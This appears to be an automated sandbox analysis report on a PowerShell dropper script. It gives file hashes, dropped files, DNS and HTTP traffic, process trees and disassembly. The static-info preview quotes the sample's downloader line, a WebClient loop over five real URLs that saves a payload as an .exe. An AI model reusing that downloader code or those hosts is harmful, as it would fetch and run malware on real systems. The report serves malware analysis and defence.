                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m2swlg4m.ubm.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vgzvplbl.o53.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xfkky2yg.1vh.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6221
                                                    Entropy (8bit):3.728488461676678
                                                    Encrypted:false
                                                    SSDEEP:48:epRELlLPr3C4U28oj7ukvhkvklCywzmdZqFzl1sSogZoK5qFzlDsSogZo+1:ESl33CxHoekvhkvCCtCqFzpHRqFzjHJ
                                                    MD5:66017E7A577805DBC8927B01159D3802
                                                    SHA1:3750ACFBB4D116B7FF6051E9A88153295AC318C4
                                                    SHA-256:3063193D4C605930A032E20668078E769801155A3AEF9457627635351CE8AC13
                                                    SHA-512:C55F3388A871011BB41C6D430A4C24BC67520012080ADCB1FF7094FEBFFFCD2778E08166B12245A9DD177E7FF0B2CB81861B62CE8C1FE6C24EBBEEE937BE3319
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ...-/.v....N.m..<..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....-.O..<...?~..<......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^vY.B...........................%..A.p.p.D.a.t.a...B.V.1.....vY.B..Roaming.@......CW.^vY.B..........................zK..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^vY.B..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^vY.B....Q...........

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5TDCQD1GLYOZ5J8VI5BC.temp

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6221
                                                    Entropy (8bit):3.728488461676678
                                                    Encrypted:false
                                                    SSDEEP:48:epRELlLPr3C4U28oj7ukvhkvklCywzmdZqFzl1sSogZoK5qFzlDsSogZo+1:ESl33CxHoekvhkvCCtCqFzpHRqFzjHJ
                                                    MD5:66017E7A577805DBC8927B01159D3802
                                                    SHA1:3750ACFBB4D116B7FF6051E9A88153295AC318C4
                                                    SHA-256:3063193D4C605930A032E20668078E769801155A3AEF9457627635351CE8AC13
                                                    SHA-512:C55F3388A871011BB41C6D430A4C24BC67520012080ADCB1FF7094FEBFFFCD2778E08166B12245A9DD177E7FF0B2CB81861B62CE8C1FE6C24EBBEEE937BE3319
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ...-/.v....N.m..<..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....-.O..<...?~..<......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^vY.B...........................%..A.p.p.D.a.t.a...B.V.1.....vY.B..Roaming.@......CW.^vY.B..........................zK..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^vY.B..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^vY.B....Q...........

                                                    Static File Info

                                                    General

                                                    File type:ASCII text, with very long lines (64682), with CRLF, LF line terminators
                                                    Entropy (8bit):5.710245148695879
                                                    TrID:
                                                      File name:ps1006.ps1
                                                      File size:801'939 bytes
                                                      MD5:c538cd6483e9cf1510943d965f890777
                                                      SHA1:4dd880286916a54f6b0b3ed74e85135d1b2fc032
                                                      SHA256:8d09f0aa9a5d675e1f28dd31f6c982d33924c58d7b9b873d5cc90f3ddea5b491
                                                      SHA512:a13b2df4a31a587d54f1b5ae9d0d0aa2d89bf9562632b40730c741273811fb769003a8e6740035ef2dbf2740273f1a8b46d882b59983fa5dd885926d29e5976e
                                                      SSDEEP:12288:8ppYXT60Mv5a8kebcetZ3Aq74GA19Td1JplTmu5jP+D/43EeI1gZEtd14Q2fb5C:fXWZ5Pbcq92zjP+sjI10+r4Q2D5C
                                                      TLSH:52053311862C9E5E07FC4BB8845E1F4E12F8CEC86884ECFAC298785F5E6DF35458A25C
                                                      File Content Preview:$qzi=new-object net.webclient;$mrs='http://habarimoto24.com/nh@http://fenett2018.com/dobgx@http://eastend.jp/bl5kfa@http://bemnyc.com/u8erijeq@http://abakus-biuro.net//a9zqemm'.split('@');$wai = '509';$kqz=$env:public+'\'+$wai+'.exe';foreach($cme in $mrs)

                                                      File Icon

                                                      Icon Hash:3270d6baae77db44

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Nov 22, 2024 09:22:04.551093102 CET4973080192.168.2.4162.43.104.133
                                                      Nov 22, 2024 09:22:04.670778036 CET8049730162.43.104.133192.168.2.4
                                                      Nov 22, 2024 09:22:04.670875072 CET4973080192.168.2.4162.43.104.133
                                                      Nov 22, 2024 09:22:04.671799898 CET4973080192.168.2.4162.43.104.133
                                                      Nov 22, 2024 09:22:04.791465044 CET8049730162.43.104.133192.168.2.4
                                                      Nov 22, 2024 09:22:06.148067951 CET8049730162.43.104.133192.168.2.4
                                                      Nov 22, 2024 09:22:06.148089886 CET8049730162.43.104.133192.168.2.4
                                                      Nov 22, 2024 09:22:06.148103952 CET8049730162.43.104.133192.168.2.4
                                                      Nov 22, 2024 09:22:06.148139954 CET4973080192.168.2.4162.43.104.133
                                                      Nov 22, 2024 09:22:06.190156937 CET4973080192.168.2.4162.43.104.133
                                                      Nov 22, 2024 09:22:06.457102060 CET4973180192.168.2.4198.185.159.145
                                                      Nov 22, 2024 09:22:06.576704025 CET8049731198.185.159.145192.168.2.4
                                                      Nov 22, 2024 09:22:06.579634905 CET4973180192.168.2.4198.185.159.145
                                                      Nov 22, 2024 09:22:06.579734087 CET4973180192.168.2.4198.185.159.145
                                                      Nov 22, 2024 09:22:06.699389935 CET8049731198.185.159.145192.168.2.4
                                                      Nov 22, 2024 09:22:07.668378115 CET8049731198.185.159.145192.168.2.4
                                                      Nov 22, 2024 09:22:07.668411970 CET8049731198.185.159.145192.168.2.4
                                                      Nov 22, 2024 09:22:07.668472052 CET4973180192.168.2.4198.185.159.145
                                                      Nov 22, 2024 09:22:12.684015989 CET4973080192.168.2.4162.43.104.133
                                                      Nov 22, 2024 09:22:12.684180975 CET4973180192.168.2.4198.185.159.145
                                                      Nov 22, 2024 09:22:12.804295063 CET8049730162.43.104.133192.168.2.4
                                                      Nov 22, 2024 09:22:12.804389954 CET4973080192.168.2.4162.43.104.133
                                                      Nov 22, 2024 09:22:12.804577112 CET8049731198.185.159.145192.168.2.4
                                                      Nov 22, 2024 09:22:12.804651976 CET4973180192.168.2.4198.185.159.145

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Nov 22, 2024 09:22:03.103416920 CET5262253192.168.2.41.1.1.1
                                                      Nov 22, 2024 09:22:03.762976885 CET53526221.1.1.1192.168.2.4
                                                      Nov 22, 2024 09:22:03.805911064 CET5960953192.168.2.41.1.1.1
                                                      Nov 22, 2024 09:22:03.946887016 CET53596091.1.1.1192.168.2.4
                                                      Nov 22, 2024 09:22:03.948726892 CET6517453192.168.2.41.1.1.1
                                                      Nov 22, 2024 09:22:04.424060106 CET53651741.1.1.1192.168.2.4
                                                      Nov 22, 2024 09:22:06.228205919 CET5137253192.168.2.41.1.1.1
                                                      Nov 22, 2024 09:22:06.455375910 CET53513721.1.1.1192.168.2.4
                                                      Nov 22, 2024 09:22:07.670380116 CET5174353192.168.2.41.1.1.1
                                                      Nov 22, 2024 09:22:07.808626890 CET53517431.1.1.1192.168.2.4
                                                      Nov 22, 2024 09:22:12.684087038 CET5189353192.168.2.41.1.1.1
                                                      Nov 22, 2024 09:22:12.822269917 CET53518931.1.1.1192.168.2.4

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Nov 22, 2024 09:22:03.103416920 CET192.168.2.41.1.1.10x208aStandard query (0)habarimoto24.comA (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:03.805911064 CET192.168.2.41.1.1.10x1285Standard query (0)fenett2018.comA (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:03.948726892 CET192.168.2.41.1.1.10x8f48Standard query (0)eastend.jpA (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:06.228205919 CET192.168.2.41.1.1.10x36b3Standard query (0)bemnyc.comA (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:07.670380116 CET192.168.2.41.1.1.10x3c97Standard query (0)abakus-biuro.netA (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:12.684087038 CET192.168.2.41.1.1.10x9957Standard query (0)yourmother4cancer.infoA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Nov 22, 2024 09:22:03.762976885 CET1.1.1.1192.168.2.40x208aServer failure (2)habarimoto24.comnonenoneA (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:03.946887016 CET1.1.1.1192.168.2.40x1285Name error (3)fenett2018.comnonenoneA (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:04.424060106 CET1.1.1.1192.168.2.40x8f48No error (0)eastend.jp162.43.104.133A (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:06.455375910 CET1.1.1.1192.168.2.40x36b3No error (0)bemnyc.com198.185.159.145A (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:06.455375910 CET1.1.1.1192.168.2.40x36b3No error (0)bemnyc.com198.49.23.144A (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:06.455375910 CET1.1.1.1192.168.2.40x36b3No error (0)bemnyc.com198.49.23.145A (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:06.455375910 CET1.1.1.1192.168.2.40x36b3No error (0)bemnyc.com198.185.159.144A (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:07.808626890 CET1.1.1.1192.168.2.40x3c97Name error (3)abakus-biuro.netnonenoneA (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:12.822269917 CET1.1.1.1192.168.2.40x9957Name error (3)yourmother4cancer.infononenoneA (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • eastend.jp
                                                      • bemnyc.com

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449730162.43.104.133807096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 22, 2024 09:22:04.671799898 CET66OUTGET /bl5kfa HTTP/1.1
                                                      Host: eastend.jp
                                                      Connection: Keep-Alive
                                                      Nov 22, 2024 09:22:06.148067951 CET1236INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Fri, 22 Nov 2024 08:22:05 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 2814
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 25 Jul 2023 10:28:06 GMT
                                                      ETag: "afe-6014d2fcf5ab8"
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="EUC-JP" /><title>404 File Not Found</title><meta name="copyright" content="Copyright XSERVER Inc."><meta name="robots" content="INDEX,FOLLOW" /><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0"><style type="text/css">* { margin: 0; padding: 0;}img { border: 0;}ul { padding-left: 2em;}html { overflow-y: scroll; background: #3b79b7;}body { font-family: "", Meiryo, " ", "MS PGothic", " Pro W3", "Hiragino Kaku Gothic Pro", sans-serif; margin: 0; line-height: 1.4; font-size: 75%; text-align: center; color: white;}h1 { font-size: 24px; font-weight: bold;}h1 { font-weight: bold; line-height: 1; padding-bottom: 20px; font-family: Helvetica, sans-serif;}h2 { text-align: center; font-weight: bold; font-size: 27px;}p { text-align: center; font-size: 14
                                                      Nov 22, 2024 09:22:06.148089886 CET1236INData Raw: 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 2e 65 78 70 6c 61 69 6e 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20
                                                      Data Ascii: px; margin: 0; padding: 0; color: white;}.explain { border-top: 1px solid #fff; border-bottom: 1px solid #fff; line-height: 1.5; margin: 30px auto; padding: 17px;}#cause { text-align: left;}#cause li {
                                                      Nov 22, 2024 09:22:06.148103952 CET587INData Raw: 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 62 61 73 65 22 3e 0a 20 20 20 20 3c 68 31 3e 3c 73 70 61 6e 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 62 72 20 2f 3e 0a 20 20 20 20 20 20 20 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 20
                                                      Data Ascii: dy><div id="base"> <h1><span>404</span><br /> File Not Found</h1> <h2></h2> <p class="explain"></p> <h3>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.449731198.185.159.145807096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 22, 2024 09:22:06.579734087 CET68OUTGET /u8erijeq HTTP/1.1
                                                      Host: bemnyc.com
                                                      Connection: Keep-Alive
                                                      Nov 22, 2024 09:22:07.668378115 CET1236INHTTP/1.1 400 Bad Request
                                                      Cache-Control: no-cache, must-revalidate
                                                      Content-Length: 2061
                                                      Content-Type: text/html; charset=UTF-8
                                                      Date: Fri, 22 Nov 2024 08:22:07 UTC
                                                      Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                      Pragma: no-cache
                                                      Server: Squarespace
                                                      X-Contextid: 4P3g8DW8/Zf0233kZ
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 400; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 400; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span {
                                                      Nov 22, 2024 09:22:07.668411970 CET1105INData Raw: 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a
                                                      Data Ascii: margin: 0 11px; font-size: 1em; font-weight: 400; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 400; color: #191919; } @media (max-width: 600px) { body { font-family: "


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:03:21:58
                                                      Start date:22/11/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1006.ps1"
                                                      Imagebase:0x7ff788560000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:1
                                                      Start time:03:21:58
                                                      Start date:22/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:03:22:11
                                                      Start date:22/11/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline"
                                                      Imagebase:0x7ff6e9160000
                                                      File size:2'759'232 bytes
                                                      MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:3
                                                      Start time:03:22:11
                                                      Start date:22/11/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES53EF.tmp" "c:\Users\user\AppData\Local\Temp\3udn0yxz\CSCAE9011C6523D4F1EAAD46B3D766D9AF5.TMP"
                                                      Imagebase:0x7ff7b0eb0000
                                                      File size:52'744 bytes
                                                      MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:2.2%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:18
                                                        Total number of Limit Nodes:1
                                                        execution_graph 5483 7ffd9b87c45d 5484 7ffd9b87c42e 5483->5484 5485 7ffd9b87c49b CreateProcessA 5483->5485 5487 7ffd9b87c80f 5485->5487 5488 7ffd9b87c039 5490 7ffd9b87c047 5488->5490 5489 7ffd9b87c00e 5490->5489 5492 7ffd9b87c36c 5490->5492 5493 7ffd9b87c41e CreateProcessA 5490->5493 5495 7ffd9b87c27f 5490->5495 5491 7ffd9b87c3ad 5492->5491 5498 7ffd9b87c41e 5492->5498 5493->5490 5495->5491 5495->5495 5496 7ffd9b87c763 CreateProcessA 5495->5496 5497 7ffd9b87c80f 5496->5497 5499 7ffd9b87c42a 5498->5499 5500 7ffd9b87c472 5498->5500 5499->5495 5500->5499 5500->5500 5501 7ffd9b87c763 CreateProcessA 5500->5501 5502 7ffd9b87c80f 5501->5502 5502->5495

                                                        Executed Functions

                                                        Function 00007FFD9B87C41E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 518COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 7ffd9b87c41e-7ffd9b87c428 1 7ffd9b87c472-7ffd9b87c499 0->1 2 7ffd9b87c42a-7ffd9b87c42d 0->2 3 7ffd9b87c42e-7ffd9b87c441 1->3 4 7ffd9b87c49b-7ffd9b87c4e3 1->4 2->3 6 7ffd9b87c443-7ffd9b87c44b 3->6 7 7ffd9b87c452-7ffd9b87c45b 3->7 8 7ffd9b87c54c-7ffd9b87c556 4->8 9 7ffd9b87c4e5-7ffd9b87c54a 4->9 6->7 10 7ffd9b87c5b4-7ffd9b87c5e6 8->10 11 7ffd9b87c558-7ffd9b87c567 8->11 9->8 19 7ffd9b87c644-7ffd9b87c6a9 10->19 20 7ffd9b87c5e8-7ffd9b87c5f7 10->20 11->10 12 7ffd9b87c569-7ffd9b87c56c 11->12 14 7ffd9b87c56e-7ffd9b87c581 12->14 15 7ffd9b87c5a6-7ffd9b87c5ae 12->15 17 7ffd9b87c583 14->17 18 7ffd9b87c585-7ffd9b87c598 14->18 15->10 17->18 18->18 22 7ffd9b87c59a-7ffd9b87c5a2 18->22 27 7ffd9b87c6ab-7ffd9b87c6ba 19->27 28 7ffd9b87c707-7ffd9b87c80d CreateProcessA 19->28 20->19 23 7ffd9b87c5f9-7ffd9b87c5fc 20->23 22->15 25 7ffd9b87c5fe-7ffd9b87c611 23->25 26 7ffd9b87c636-7ffd9b87c63e 23->26 29 7ffd9b87c613 25->29 30 7ffd9b87c615-7ffd9b87c628 25->30 26->19 27->28 31 7ffd9b87c6bc-7ffd9b87c6bf 27->31 40 7ffd9b87c80f 28->40 41 7ffd9b87c815-7ffd9b87c899 call 7ffd9b87c8bd 28->41 29->30 30->30 32 7ffd9b87c62a-7ffd9b87c632 30->32 33 7ffd9b87c6c1-7ffd9b87c6d4 31->33 34 7ffd9b87c6f9-7ffd9b87c701 31->34 32->26 36 7ffd9b87c6d8-7ffd9b87c6eb 33->36 37 7ffd9b87c6d6 33->37 34->28 36->36 39 7ffd9b87c6ed-7ffd9b87c6f5 36->39 37->36 39->34 40->41 49 7ffd9b87c902-7ffd9b87c90a 41->49 50 7ffd9b87c89b-7ffd9b87c8a1 41->50 51 7ffd9b87c90c-7ffd9b87c913 call 7ffd9b8706b0 49->51 52 7ffd9b87c918-7ffd9b87c91f 49->52 53 7ffd9b87c8a3 50->53 54 7ffd9b87c8a8-7ffd9b87c8bc 50->54 51->52 56 7ffd9b87c921-7ffd9b87c929 52->56 57 7ffd9b87c937-7ffd9b87c93e 52->57 53->54 56->57 58 